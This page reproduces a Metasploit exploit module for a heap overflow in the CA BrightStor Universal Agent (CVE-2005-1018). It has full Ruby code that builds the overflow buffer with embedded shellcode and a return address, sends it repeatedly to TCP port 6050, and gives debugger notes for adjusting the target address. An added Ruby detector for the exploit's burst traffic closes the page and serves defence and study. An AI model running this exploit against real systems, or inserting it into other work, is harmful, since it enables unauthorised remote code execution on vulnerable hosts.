GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/brightstor/universal_agent.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'CA BrightStor Universal Agent Overflow',
        'Description' => %q{
          This module exploits a convoluted heap overflow in the CA
          BrightStor Universal Agent service. Triple userland
          exception results in heap growth and execution of
          dereferenced function pointer at a specified address.
        },
        'Author' => [ 'hdm' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2005-1018'],
          [ 'OSVDB', '15471' ],
          [ 'BID', '13102'],
          [ 'URL', 'http://www.idefense.com/application/poi/display?id=232&type=vulnerabilities'],
        ],
        'Privileged' => true,
        'Payload' => {
          # 250 bytes of space (bytes 0xa5 -> 0xa8 = reversed)
          'Space' => 164,
          'BadChars' => "\x00",
          'StackAdjustment' => -3500,
        },
        'Platform' => %w{win},
        'Targets' => [
          [
            'Magic Heap Target #1',
            {
              'Platform' => 'win',
              'Ret' => 0x01625c44, # We grow to our own return address
            },
          ],
        ],
        'DisclosureDate' => '2005-04-11',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(6050)
      ]
    )
  end

  def exploit
    print_status("Trying target #{target.name}...")

    # The server reverses four bytes starting at offset 0xa5 :0

    # Create the overflow string
    boom = 'X' * 1024

    # Required field to trigger the fault
    boom[248, 2] = [1000].pack('V')

    # The shellcode, limited to 250 bytes (no nulls)
    boom[256, payload.encoded.length] = payload.encoded

    # This should point to itself
    boom[576, 4] = [target.ret].pack('V')

    # This points to the code below
    boom[580, 4] = [target.ret + 8].pack('V')

    # We have 95 bytes, use it to hop back to shellcode
    boom[584, 6] = "\x68" + [target.ret - 320].pack('V') + "\xc3"

    # Stick the protocol header in front of our request
    req = "\x00\x00\x00\x00\x03\x20\xa8\x02" + boom

    # We keep making new connections and triggering the fault until
    # the heap is grown to encompass our known return address. Once
    # this address has been allocated and filled, each subsequent
    # request will result in our shellcode being executed.

    1.upto(200) { |i|
      connect
      print_status("Sending request #{i} of 200...") if (i % 10) == 0
      sock.put(req)
      disconnect

      # Give the process time to recover from each exception
      select(nil, nil, nil, 0.1)
    }

    handler
  end
end


__END__
012a0d91 8b8e445c0000 mov ecx,[esi+0x5c44]
012a0d97 83c404 add esp,0x4
012a0d9a 85c9 test ecx,ecx
012a0d9c 7407 jz ntagent+0x20da5 (012a0da5)
012a0d9e 8b11 mov edx,[ecx] ds:0023:41327441=???????
012a0da0 6a01 push 0x1
012a0da2 ff5204 call dword ptr [edx+0x4]

Each request will result in another chunk being allocated, the exception
causes these chunks to never be freed. The large chunk size allows us to
predict the location of our buffer and grow our buffer to where we need it.

If these addresses do not match up, run this exploit, then attach with WinDbg:

> s 0 Lfffffff 0x44 0x5c 0x61 0x01

Figure out the pattern, replace the return address, restart the service,
and run it through again. Only tested on WinXP SP1

011b5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
011c5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
011d5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
011e5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
011f5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01205c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
[ snip ]
01605c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01615c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01625c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01635c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01645c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01655c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01665c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01675c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01685c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01695c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
016a5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
016b5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
016c5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
016d5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01725c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
017e5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
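The module's technique leaves a distinctive network footprint: many short-lived connections to TCP/6050 in quick succession, each carrying the same 8-byte protocol header followed by a large buffer dominated by a single filler byte, because the heap has to be grown one leaked chunk at a time until it reaches the hard-coded return address. The following detector is an added example written for this page and is not part of the Metasploit module or of any Rapid7 or CA tooling. It assumes a sensor that hands over per-connection records as hashes with `:src`, `:dst_port`, `:time` and `:data` keys (that record shape, the 0.7 filler ratio, the 30-second window and the 10-connection threshold are all assumptions chosen here); the sample records are constructed inline so it runs offline.

```ruby
# Added example: heuristic detection of the BrightStor Universal Agent
# heap-grooming pattern (repeated oversized requests to TCP/6050).
# Not part of the Metasploit module; record format and thresholds are assumptions.

BRIGHTSTOR_AGENT_PORT = 6050
# 8-byte protocol header the module prepends to every request
BRIGHTSTOR_HEADER = "\x00\x00\x00\x00\x03\x20\xa8\x02".b
OVERFLOW_BODY_LEN = 1024   # size of the overflow buffer the module sends
FILLER_RATIO = 0.7         # assumed: share of one byte value that marks a filler buffer

# True when a single request looks like the overflow buffer: correct header,
# at least 1024 bytes of body, and the body dominated by one byte value.
def suspicious_request?(data)
  data = data.b
  return false unless data.start_with?(BRIGHTSTOR_HEADER)
  body = data.byteslice(BRIGHTSTOR_HEADER.bytesize..-1)
  return false if body.bytesize < OVERFLOW_BODY_LEN
  _top_byte, top_count = body.bytes.tally.max_by { |_, c| c }
  top_count.to_f / body.bytesize > FILLER_RATIO
end

# Sliding-window burst detection per source address. Returns one alert per
# source whose suspicious requests reach `threshold` within `window` seconds.
def detect_bursts(records, window: 30.0, threshold: 10)
  alerts = []
  records.group_by { |r| r[:src] }.each do |src, rs|
    hits = rs.select { |r| r[:dst_port] == BRIGHTSTOR_AGENT_PORT && suspicious_request?(r[:data]) }
    times = hits.map { |r| r[:time] }.sort
    start = 0
    times.each_with_index do |t, i|
      start += 1 while t - times[start] > window   # slide the window forward
      count = i - start + 1
      if count >= threshold
        alerts << { src: src, count: count, first: times[start], last: t }
        break
      end
    end
  end
  alerts
end

# Constructed sample: one source hammering the port every 0.1 s (mirrors the
# module's per-request sleep), two benign-looking requests, and a lone oversized
# request that should not reach the burst threshold.
SAMPLE_RECORDS = begin
  t0 = Time.utc(2024, 1, 1, 12, 0, 0)
  noisy = (0...20).map do |i|
    { src: '10.0.0.5', dst_port: 6050, time: t0 + i * 0.1, data: BRIGHTSTOR_HEADER + ('X' * 1024) }
  end
  varied_body = (0...1024).map { |i| (i * 37 % 251).chr }.join.b   # no dominant byte
  benign = [
    { src: '10.0.0.9', dst_port: 6050, time: t0 + 1, data: BRIGHTSTOR_HEADER + "\x01\x00host\x00".b },
    { src: '10.0.0.9', dst_port: 6050, time: t0 + 2, data: BRIGHTSTOR_HEADER + varied_body },
    { src: '10.0.0.7', dst_port: 6050, time: t0 + 3, data: BRIGHTSTOR_HEADER + ('X' * 1024) },
  ]
  noisy + benign
end

if __FILE__ == $0
  detect_bursts(SAMPLE_RECORDS).each do |a|
    puts "ALERT #{a[:src]}: #{a[:count]} oversized agent requests between #{a[:first]} and #{a[:last]}"
  end
end
```

The body-shape check is deliberately loose (a fixed header plus a filler-dominated buffer) so that a different encoder or padding byte still matches; the burst count is what separates this from a single malformed client, since the heap-growth approach needs tens to hundreds of connections before anything executes. Pairing the alert with a crash or restart of the agent service on the host side raises confidence further.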